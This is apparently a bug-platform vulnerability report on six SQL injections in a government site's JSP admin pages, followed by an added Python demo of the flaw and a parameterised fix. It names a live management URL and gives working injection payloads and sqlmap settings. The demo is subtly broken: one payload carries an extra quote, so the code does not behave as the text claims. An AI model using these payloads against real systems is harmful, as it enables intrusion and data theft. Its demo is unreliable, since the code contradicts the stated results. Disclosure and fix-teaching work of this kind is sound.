### Brief description:

Just going for the numbers. Back-end SQL injection; I have a slight suspicion this is the work of an intern... or a temp?

### Details:

Back-end SQL injection 1

The first one is the slightly more cumbersome case and is used as the walkthrough; the rest work the same way. It requires being logged in with application-administrator or system-administrator privileges.

/jis/manage/datasbase/que_datasbase.jsp

```
if (que_keywords.length() > 0) {
    // user-supplied search keyword concatenated straight into the WHERE clause
    strSqlCondition.append(" AND vc_collocatename like '%" + que_keywords + "%'");
}
```

To make this exploitable with a tool, first add a listener entry under "listener management":

http://management.ysx.gov.cn/jis/manage/datasbase/opr_datasbase.jsp?fn_billstatus=A&

[<img src="https://images.seebug.org/upload/201401/26223057d516aeff1e2f1a1159db0097c7cd92e3.png" alt="image025.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26223057d516aeff1e2f1a1159db0097c7cd92e3.png)

Any IP reachable from the public internet will do, as long as the username and password are correct; otherwise it reports something like "unable to connect".

[<img src="https://images.seebug.org/upload/201401/262231512c43236f3208c7162394c1344f395cb8.png" alt="image027.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262231512c43236f3208c7162394c1344f395cb8.png)

Once the entry is added there is a string in the result list to use as a marker. Enter ' and '%'=' in the search box: the page does not change, because the clause becomes like '%' and '%'='%', which is true for every row.

[<img src="https://images.seebug.org/upload/201401/2622335890c63f23ebb0f43d90c274d5f6926258.png" alt="image029.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/2622335890c63f23ebb0f43d90c274d5f6926258.png)

Enter ' and '1'=' and the page changes: '1'='%' is false, so the row disappears. That difference in the page is the boolean-blind oracle.

[<img src="https://images.seebug.org/upload/201401/2622332837a680c7f7de0400d8ce8bd5d15e0eb1.png" alt="image031.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/2622332837a680c7f7de0400d8ce8bd5d15e0eb1.png)

Take the session cookie and hand it to the tool. When setting sqlmap's POST data it is best to write it like this: --data "que_keywords=' * and '%'='" (the * marks the injection point, so sqlmap inserts its payloads inside the quote context instead of breaking it).

[<img src="https://images.seebug.org/upload/201401/26223428e85dfc75d8638debdcad8f257f6eead0.png" alt="image033.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26223428e85dfc75d8638debdcad8f257f6eead0.png)

[<img src="https://images.seebug.org/upload/201401/262234469ef787baa9f905d501d80832f2e38b60.png" alt="image035.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262234469ef787baa9f905d501d80832f2e38b60.png)

Back-end SQL injection 2

jis/manage/app/que_application.jsp

```
if (que_keywords.length() > 0) {
    // same keyword concatenated twice, once per searched column
    strSqlCondition.append(" AND vc_appname LIKE '%" + que_keywords + "%' OR vc_appmark LIKE '%" + que_keywords + "%'");
}
```

Same privilege requirement as above. As before, enter ' and '%'=' in the search field:

[<img src="https://images.seebug.org/upload/201401/262235160a61b1509eb63fd1e17be00299264ac6.png" alt="image037.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262235160a61b1509eb63fd1e17be00299264ac6.png)

and then ' and '1'=':

[<img src="https://images.seebug.org/upload/201401/262235352efb03fe052d75221f02dad7d2f9dd8b.png" alt="image039.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262235352efb03fe052d75221f02dad7d2f9dd8b.png)

Tool exploitation is the same as for the previous one.

Back-end SQL injection 3

jis/sys/user/que_userginfo.jsp, same pattern as the two above:

```
if (que_keywords.length() > 0)
    // unparameterised keyword in both LIKE patterns
    strSqlCondition.append(" AND vc_usergroupname like '%" + que_keywords + "%' OR vc_groupallname like '%" + que_keywords + "%'");
```

Searching for ' and '%'=' returns every record:

[<img src="https://images.seebug.org/upload/201401/26223625d4b4928b3ea8318a9c4543c694051f33.png" alt="image041.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26223625d4b4928b3ea8318a9c4543c694051f33.png)

### Proof of vulnerability:

Back-end SQL injection 4

jis/manage/role/que_approleinfo.jsp, where both que_keywords and que_webid are concatenated unquoted-safe into the condition:

```
if (que_keywords.length() > 0) {
    strSqlCondition.append(" AND vc_rolename like '%" + que_keywords + "%'");
}
if (que_webid.length() > 0) {
    // second injectable parameter on the same page
    strSqlCondition.append(" AND i_webid = '" + que_webid + "'");
}
```

Enter ' and '%'=':

[<img src="https://images.seebug.org/upload/201401/26223658afd9ca7751a555a8f9b40ba4b84ae25b.png" alt="image043.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26223658afd9ca7751a555a8f9b40ba4b84ae25b.png)

and ' and '%'='1:

[<img src="https://images.seebug.org/upload/201401/262237251b933cafa35dd20c281696bb9136021c.png" alt="image045.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262237251b933cafa35dd20c281696bb9136021c.png)

Back-end SQL injection 5

jis/manage/log/que_log.jsp

```
if (que_keywords.length() > 0) {
    // keyword spliced into four LIKE patterns
    strSqlCondition.append(" AND vc_operatecontent like '%" + que_keywords + "%' OR c_userid like '%" + que_keywords + "%' OR vc_modulename like '%" + que_keywords + "%' OR vc_state like '%" + que_keywords + "%' ");
}
```

Searching for admin%' or '%'=' returns all records:

[<img src="https://images.seebug.org/upload/201401/262237547753cbeb71e5e23960b93b843c5f2780.png" alt="image047.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262237547753cbeb71e5e23960b93b843c5f2780.png)

Changing it to admin%' and '%'=' shows only admin's log entries:

[<img src="https://images.seebug.org/upload/201401/262238153807b262b627a2176e208696a04f16f4.png" alt="image049.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/262238153807b262b627a2176e208696a04f16f4.png)

Back-end SQL injection 6

jis/manage/sysview/que_sysview.jsp, enter fgj' or '%'=':

[<img src="https://images.seebug.org/upload/201401/26223838b6052206ca7df0d31c09e2c1f03be5b2.png" alt="image051.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/26223838b6052206ca7df0d31c09e2c1f03be5b2.png)
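All six findings above share one pattern: the search keyword is spliced into a LIKE pattern by string concatenation. The following is an added example, not code from the report or from the affected application, that reproduces the StringBuilder concatenation in Python against an in-memory SQLite table and runs the report's own payloads through it, then shows the parameterised form that fixes all six. The table name, the sample rows and the base condition WHERE 1=1 are constructed stand-ins; only the column name vc_collocatename and the payloads come from the report.

```python
import sqlite3

# Constructed sample data standing in for the application's listener table.
# The real schema is not in the report; only vc_collocatename is known.
SAMPLE_NAMES = ["test-db", "prod-db", "admin-archive"]


def _connect() -> sqlite3.Connection:
    """Fresh in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_datasbase (vc_collocatename TEXT)")
    conn.executemany(
        "INSERT INTO t_datasbase VALUES (?)", [(n,) for n in SAMPLE_NAMES]
    )
    return conn


def vulnerable_condition(que_keywords: str) -> str:
    """Mirror of the JSP's strSqlCondition.append(...) concatenation.

    The base condition WHERE 1=1 is an assumption; the JSP appends to an
    existing condition that the report does not show.
    """
    cond = " WHERE 1=1"
    if len(que_keywords) > 0:
        cond += " AND vc_collocatename like '%" + que_keywords + "%'"
    return cond


def vulnerable_query(que_keywords: str) -> list:
    """Run the concatenated query; the keyword rewrites the WHERE clause."""
    conn = _connect()
    sql = "SELECT vc_collocatename FROM t_datasbase" + vulnerable_condition(que_keywords)
    return sorted(row[0] for row in conn.execute(sql))


def _escape_like(value: str) -> str:
    """Escape LIKE metacharacters so the keyword matches only itself."""
    return (
        value.replace("\\", "\\\\")
             .replace("%", "\\%")
             .replace("_", "\\_")
    )


def safe_query(que_keywords: str) -> list:
    """Hardened form: bound parameter plus ESCAPE so % and _ are literals.

    The pattern is built in code and passed as a parameter; the database
    never parses the keyword as SQL, so ' and '%'=' is just a substring.
    """
    conn = _connect()
    sql = "SELECT vc_collocatename FROM t_datasbase WHERE 1=1"
    params = []
    if que_keywords:
        sql += " AND vc_collocatename LIKE ? ESCAPE '\\'"
        params.append("%" + _escape_like(que_keywords) + "%")
    return sorted(row[0] for row in conn.execute(sql, params))


if __name__ == "__main__":
    for payload in ["admin", "' and '%'='", "' and '1'=''", "admin%' or '%'='"]:
        print(repr(payload))
        print("  concatenated:", vulnerable_condition(payload))
        print("  vulnerable  ->", vulnerable_query(payload))
        print("  parameterised->", safe_query(payload))
```

The two payloads the report uses as its oracle behave exactly as described: ' and '%'=' leaves the result set untouched, ' and '1'=' empties it, and admin%' or '%'=' returns every row. With the parameterised query the same strings are treated as literal search text and match nothing, and a bare % no longer acts as a wildcard because of the ESCAPE clause.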